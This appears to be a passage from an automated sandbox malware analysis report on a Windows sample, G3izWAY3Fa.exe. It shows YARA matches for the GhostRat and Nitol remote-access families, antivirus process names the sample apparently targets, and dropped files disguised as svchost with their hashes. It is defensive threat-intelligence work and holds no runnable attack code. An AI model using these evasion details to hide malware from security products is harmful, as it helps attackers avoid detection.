2_2_00402AD0

Source: C:\Windows\Temp\server.exe

Code function: 3_2_10007070 LookupAccountNameA,IsValidSid,Sleep,LoadLibraryA,GetProcAddress,FreeLibrary,

3_2_10007070

Source: C:\Windows\Temp\ .exe

5_2_00433020

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Code function: 0_2_004059FF GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_004059FF

AV process strings found (often used to terminate AV products)

Source: server.exe, server.exe, 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: server.exe, server.exe, 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: KSafeTray.exe
Source: server.exe, server.exe, 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 360tray.exe

Stealing of Sensitive Information

Yara detected GhostRat

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY

Yara detected Nitol

Source: Yara match	File source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 7472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchsot.exe PID: 8104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchsot.exe PID: 4848, type: MEMORYSTR

Remote Access Functionality

Yara detected GhostRat

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY

Yara detected Nitol

Source: Yara match	File source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 7472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchsot.exe PID: 8104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchsot.exe PID: 4848, type: MEMORYSTR

Windows Analysis Report
G3izWAY3Fa.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

ID:	1579781
Product:	CloudBasic
Start time:	09:00:36
Start date:	23.12.2024
Sample:	G3izWAY3Fa.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	118f7f61b6afb1da5e94ea1740222c73
SHA1:	5a0d66ec18cdb3812bad259999cf64d051cefa8b
SHA256:	aaf88339c23080ffd423da3b03a229d220b55c5e007c1f413fbd3633c48aad44
Filetype:	Win32 Executable (generic) a (10002005/4) 92.16%

Name	Type	MD5	SHA1	SHA256
C:\Windows\SysWOW64\033726\RCX773C.tmp	PE32 executable (GUI) Intel 80386, for MS Windows	00C090DAE3EE360E575655FE89121D83	7E12E9268476B23B78E2953353DF38823DB0BD17	BD6D059B8F8C15C71553D77E99453265CE87C43793D6330C3B80C05CD704A8AD
C:\Windows\SysWOW64\033726\svchost.exe	PE32 executable (GUI) Intel 80386, for MS Windows	8A953A49796B7F8C7539A6B2BC175397	5E4B317DD08B080EDCF127FF6E5F86F0108372BE	ABC198E7B27D864DED945C2053C781E59CD5294BEE301D7D2B931A1F0D4087A7
C:\Windows\SysWOW64\034031\RCX8B31.tmp	PE32 executable (GUI) Intel 80386, for MS Windows	B573CCA4145727C22E1AD6774DBF3705	E03C46743B3F3FAE25CF03429782B27C97AAA8F2	C76750E8A32C78D3883EF1B16666672E06CC44F2A2BAB783B8D4501AD5EF8CF2
C:\Windows\SysWOW64\034031\svchost.exe	PE32 executable (GUI) Intel 80386, for MS Windows	00C090DAE3EE360E575655FE89121D83	7E12E9268476B23B78E2953353DF38823DB0BD17	BD6D059B8F8C15C71553D77E99453265CE87C43793D6330C3B80C05CD704A8AD
C:\Windows\SysWOW64\05CA35CC	ASCII text, with no line terminators	7A1920D61156ABC05A60135AEFE8BC67	808D7DCA8A74D84AF27A2D6602C3D786DE45FE1E	21B111CBFE6E8FCA2D181C43F53AD548B22E38ACA955B9824706A504B0A07A2D
C:\Windows\Temp\ .exe	PE32 executable (GUI) Intel 80386, for MS Windows	CCEE0912E79D434F0D2C1E11274F23C0	9A34CD426601ACE88DCB91B3820DC98EBE29ED96	679B9AF0DEF4DBBE2E179AC05F9A7AB4C2FFC28A71964A9E9EDF2986BDC1B1A2
C:\Windows\Temp\server.exe	PE32 executable (GUI) Intel 80386, for MS Windows	8A953A49796B7F8C7539A6B2BC175397	5E4B317DD08B080EDCF127FF6E5F86F0108372BE	ABC198E7B27D864DED945C2053C781E59CD5294BEE301D7D2B931A1F0D4087A7
C:\Windows\Temp\v5.exe	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed	48A02F4A003E8CBE683CF5DADA237168	2A81C0962ADEEF89CE33DE746ADFD455C652D216	11933D11631C99743C3F457B30D5EBB72399BF52D53B51E9CD21E17B1CA1DFB0
C:\Windows\XXXXXX05CA35CC\svchsot.exe	PE32 executable (GUI) Intel 80386, for MS Windows	8A953A49796B7F8C7539A6B2BC175397	5E4B317DD08B080EDCF127FF6E5F86F0108372BE	ABC198E7B27D864DED945C2053C781E59CD5294BEE301D7D2B931A1F0D4087A7
C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	PE32 executable (GUI) Intel 80386, for MS Windows	00C090DAE3EE360E575655FE89121D83	7E12E9268476B23B78E2953353DF38823DB0BD17	BD6D059B8F8C15C71553D77E99453265CE87C43793D6330C3B80C05CD704A8AD
\Device\Null	ASCII text, with CRLF line terminators	6B2C41D2A2AF44EFB642F9C3DBCA6668	5D98044E6220AD035474C209EF75CB8F37C6965C	623F011819A1BD73F84EE6593735C89462E596A4AD0B730B0F650A486D63E4C8

Windows Analysis Report G3izWAY3Fa.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Windows Analysis Report
G3izWAY3Fa.exe

Malware Threat Intel
Provided by